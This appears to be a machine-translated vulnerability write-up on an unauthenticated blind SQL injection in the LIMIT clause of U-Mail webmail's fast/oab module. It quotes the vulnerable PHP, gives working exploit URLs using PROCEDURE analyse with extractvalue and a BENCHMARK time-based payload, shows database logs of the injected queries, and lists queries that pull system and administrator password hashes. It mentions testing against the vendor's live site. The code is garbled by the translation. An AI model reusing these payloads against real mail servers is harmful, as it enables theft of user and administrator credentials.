U-Mail system injection 2 (SQL Injections in MySQL LIMIT clause, No Logon required, with a script for getting the user password)

U-Mail system injection 2 (SQL Injections in MySQL LIMIT clause, No Logon required, with a script for getting the user password)

SQL Injections in MySQL LIMIT clause, which is not strictly filtered and generates blind injection. As a result, the user name and password can be injected without logon.

The last search was only performed on the client. Today, I did not search in the fast directory and found another one.

Note: All functions in the client directory can be executed only after logon. In the fast directory, you do not need to log on to some existing functions, but cannot view emails.

The vulnerability is the same as the previous one, but the file is different. The access permission is not strictly set here and can be accessed by any user. As a result, SQL injection can be performed without logon. limit cannot use sleep and benchamark delay is used.

Vulnerability file/fast/oab/module/operates. php code

If (ACTION = "member-get") {$ dept_id = gss ($ _ GET ['dept _ id']); $ keyword = gss ($ _ GET ['keyword']); $ page = $ _ GET ['page']? Gss ($ _ GET ['page']): 1; // limit $ limit = $ _ GET ['limit']? Gss ($ _ GET ['limit']): 25; // user-controllable variable $ orderby = gss ($ _ GET ['orderby']); $ is_reverse = gss ($ _ GET ['is _ reverse']); $ data_cache = $ Department-> getDepartmentByDomainID ($ domain_id, "dept_id, name, parent_id, 'order' ", 0); $ department_list = create_array ($ data_cache," dept_id "," name "); $ where =" "; if ($ dept_id & $ dept_id! = "-1") {$ Tree = $ Department-> getTreeObject (); $ Tree-> set_data_cache ($ data_cache); $ Tree-> sort_data (-1, 1 ); $ dept_ids = $ Tree-> get_child_id ($ dept_id); $ user_ids = $ Department-> getMailboxIDByDepartmentID ($ dept_ids, 0); $ where = "t1.UserID IN (". $ user_ids. ")";} if ($ keyword) {if ($ where) {$ where. = "AND";} if (strpos ($ keyword, "@") {$ key_tmp = explode ("@", $ keyword ); $ keyword = $ key_tmp [0];} $ where. = "(t1.FullName LIKE \" % ". $ keyword. "% \" OR t1.Mailbox LIKE \ "% ". $ keyword. "% \") ";} switch ($ orderby) {case" fullname ": $ orderby =" t1.FullName "; break; case" mailbox ": $ orderby =" t1.Mailbox "; break; case "sex": $ orderby = "t2.sex"; break; case "birthday": $ orderby = "t2.birthday"; break; case "mobile ": $ orderby = "t2.mobil"; break; case "tel": $ orderby = "t2.teleextension"; break; case "position": $ orderby = "t2.headship"; break; case "group_num": $ orderby = "t2.o _ group"; break; case "email": $ orderby = "t1.Mailbox"; break; $ orderby = "";} $ arr_tmp = $ Mailbox-> getMailboxInfo ($ domain_id, $ where, $ page, $ limit, $ orderby, $ is_reverse, 0); // enters the Function

$ Limit is controllable, resulting in the injection and exploitation process.

First, post data to the url. (Note: This interface is not used for arbitrary logon. Only a few functions can be executed after execution. Therefore, if a function with SQL defects is executed, there is a corresponding SQL Injection problem that does not require logon. If you can update the password, the problem may result in the defect of obtaining any user password, but the accessible functions are limited, user emails cannot be viewed)
 

After obtaining the authentication, run the following command:

Http://mail.fuck.com/webmail/fast/oab/index.php? Module = operate & action = member-get & limit = 1, 1 + PROCEDURE + analyze (extractvalue (rand (), concat (0x3a, version (), 1)

The result is as follows:
 

The SQL statement is

150128 21:44:43 3142 Connectumail@localhost on  3142 QuerySET NAMES 'UTF8' 3142 Init DBumail 3142 QuerySELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id` 3142 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 3142 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1) 3142 Quit

 

Because the error ECHO is not executed, we implement blind injection. The code is

Http://mail.fuck.com/webmail/fast/oab/index.php? Module = operate & action = member-get & limit = 1, 1 PROCEDURE analyze (extractvalue (rand (), concat (0x3a, (if (ascii (substr (select password from userlist where userid = 2), 50000000) = 97, BENCHMARK (, SHA1 (1), 1 )))), 1)
 

Its SQL code is

150128 21:47:16 3144 Connectumail@localhost on  3144 QuerySET NAMES 'UTF8' 3144 Init DBumail 3144 QuerySELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id` 3144 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 3144 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*FROM userlist as t1, mailuserinfo as t2WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)

Successful Injection

Therefore, you can run different user accounts and passwords through scripts.

# Select + password + from + userlist + where + userid = 2 system user

# Select + password + from + web_usr + where + usr_code = 1 administrator user

# Select + password + from + web_usr + where + usr_code = 2 admin user

You can retrieve username password by traversing userid.

Blind injection script (half of the script is written. It will be used if there is no binary method)

Local Test
 

And official website management Logon
 

 

 

Solution:

intval